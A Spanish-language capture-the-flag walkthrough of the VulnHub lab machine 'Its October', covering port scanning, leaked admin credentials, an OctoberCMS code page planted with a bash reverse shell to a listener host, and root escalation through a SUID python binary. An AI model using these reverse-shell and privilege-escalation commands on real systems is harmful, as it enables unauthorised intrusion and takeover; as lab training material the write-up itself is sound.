[VULNHUB] Its October

Hoy vamos a hackear la maquina de Vulnhub llamada Its October.Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/its-october-1,460/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.62 Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-24 11:11 CEST Nmap scan report for october.home (192.168.1.62) Host is up (0.00031s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA) | 256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA) |_ 256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Homepage | My new websites 3306/tcp open mysql MySQL (unauthorized) 8080/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.38 (Debian) |_http-title: My Note Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.94 seconds
    Visitamos http://192.168.1.62:8080/ y en el codigo fuente de la pagina aparece:
    href="mynote.txt"
    Si visitamos la nota en http://192.168.1.62:8080/mynote.txt vemos qu el contenido de la nota es:
    user - admin password - adminadmin2
    Nos guardamos los credenciales :) Lanzamos un gobuster al puerto 80 para ver si encontramos algo interesante.
    ~ > gobuster -u http://192.168.1.62/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://192.168.1.62/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== 2020/08/24 11:15:40 Starting gobuster ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /0 (Status: 200) /backend (Status: 302) /config (Status: 301) /index.php (Status: 200) /modules (Status: 301) /plugins (Status: 301) /server-status (Status: 403) /storage (Status: 301) /themes (Status: 301) /vendor (Status: 301) ===================================================== 2020/08/24 11:17:37 Finished =====================================================
    Vemos que hay un directorio interesante llamado "backend". Lo visitamos y nos pide user y password, usamos los que hemos encontrado antes!
    http://192.168.1.62/backend/backend/auth/signin user: admin password: adminadmin2
    Una vez logueados, vamos a: CMS -> Add -> Code En el codigo ponemos:
    function onstart(){ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.59/7777 0>&1'"); }
    Ponemos un nombre cualquiera a "Filename", ponemos Layout "Default, de titulo ponemos "shell" y le damos a save. Arrancamos el nc y lo ponemos a la escucha.
    ~ > nc -nlvp 7777 listening on [any] 7777 ...
    Con nc a la escucha visitamos http://192.168.1.139/shell
  • Low Shell
  • Obtenemos nuestra reverse shell :)
    ~ > nc -nlvp 7777 listening on [any] 7777 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.62] 44046 bash: cannot set terminal process group (451): Inappropriate ioctl for device bash: no job control in this shell www-data@october:/var/www/html/octobercms$
    Una vez dentro, miramos si hay algun SUID que pueda servirnos para escalar los privilegios.
    bash-5.0$ find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null /usr/bin/newgrp /usr/bin/su /usr/bin/python3.7m /usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/mount /usr/bin/umount /usr/bin/python3.7 /usr/bin/gpasswd /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper bash-5.0$
  • Privilege Escalation
  • Vemos que esta python3.7m con SUID, asi que podemos usarlo para conseguir una shell con privilegios!
    bash-5.0$ python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")' python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")' bash-5.0# id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
  • proof.txt
  • Por ultimo, miramos la flag de root!
    bash-5.0# cat proof.txt Best of Luck $2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq
  • End
  • Y con esto ya seriamos root de la maquina.